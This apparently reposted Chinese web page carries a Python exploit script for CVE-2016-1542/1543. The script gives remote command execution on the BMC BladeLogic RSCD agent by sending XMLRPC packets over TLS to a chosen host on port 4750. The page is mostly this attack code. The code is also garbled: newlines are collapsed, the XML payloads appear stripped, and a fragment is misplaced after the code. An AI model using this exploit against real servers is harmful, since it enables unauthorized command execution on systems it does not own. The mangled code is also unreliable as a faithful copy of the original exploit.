# CVE-2016-1542 BMC BladeLogic 8.3.00.64 遠程命令執行漏洞
==EXP==
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version # Filename: BMC_rexec.py # Github: https://github.com/bao7uo/bmc_bladelogic # Date: 2018-01-24 # Exploit Author: Paul Taylor / Foregenix Ltd # Website: http://www.foregenix.com/blog # Version: BMC RSCD agent 8.3.00.64 # CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011) # Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543 # Tested on: 8.3.00.64 #!/usr/bin/python # BMC BladeLogic RSCD agent remote exec - XMLRPC version # CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011) # By Paul Taylor / Foregenix Ltd # Credit: https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic # Credit: https://github.com/yaolga # Credit: Nick Bloor for AWS image for testing :-) # https://github.com/NickstaDB/PoC/tree/master/BMC_RSCD_RCE import socket import ssl import sys import argparse import requests import httplib from requests.packages.urllib3 import PoolManager from requests.packages.urllib3.connection import HTTPConnection from requests.packages.urllib3.connectionpool import HTTPConnectionPool from requests.adapters import HTTPAdapter class MyHTTPConnection(HTTPConnection): def __init__(self, unix_socket_url, timeout=60): HTTPConnection.__init__(self, HOST, timeout=timeout) self.unix_socket_url = unix_socket_url self.timeout = timeout def connect(self): self.sock = wrappedSocket class MyHTTPConnectionPool(HTTPConnectionPool): def __init__(self, socket_path, timeout=60): HTTPConnectionPool.__init__(self, HOST, timeout=timeout) self.socket_path = socket_path self.timeout = timeout def _new_conn(self): return MyHTTPConnection(self.socket_path, self.timeout) class MyAdapter(HTTPAdapter): def __init__(self, timeout=60): super(MyAdapter, self).__init__() self.timeout = timeout def get_connection(self, socket_path, proxies=None): return MyHTTPConnectionPool(socket_path, self.timeout) def request_url(self, request, proxies): return request.path_url def optParser(): parser = argparse.ArgumentParser( description="Remote exec " + "BladeLogic Server Automation RSCD agent" ) parser.add_argument("host", help="IP address of a target system") parser.add_argument( "-p", "--port", type=int, default=4750, help="TCP port (default: 4750)" ) parser.add_argument("command", help="Command to execute") opts = parser.parse_args() return opts def sendXMLRPC(host, port, packet, tlsrequest): r = tlsrequest.post( 'http://' + host + ':' + str(port) + '/xmlrpc', data=packet ) print r.status_code print r.content return intro = """""" options = optParser() rexec = options.command PORT = options.port HOST = options.host rexec = """ RemoteServer.intro 2016-1-14-18-10-30-3920958 7 0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252; 8.6.01.66 """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((HOST, PORT)) sock.sendall("TLSRPC") wrappedSocket = ssl.wrap_socket(sock) adapter = MyAdapter() s = requests.session() s.mount("http://", adapter) sendXMLRPC(HOST, PORT, intro, s) sendXMLRPC(HOST, PORT, rexec, s) wrappedSocket.close() RemoteExec.exec """ + rexec + """
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容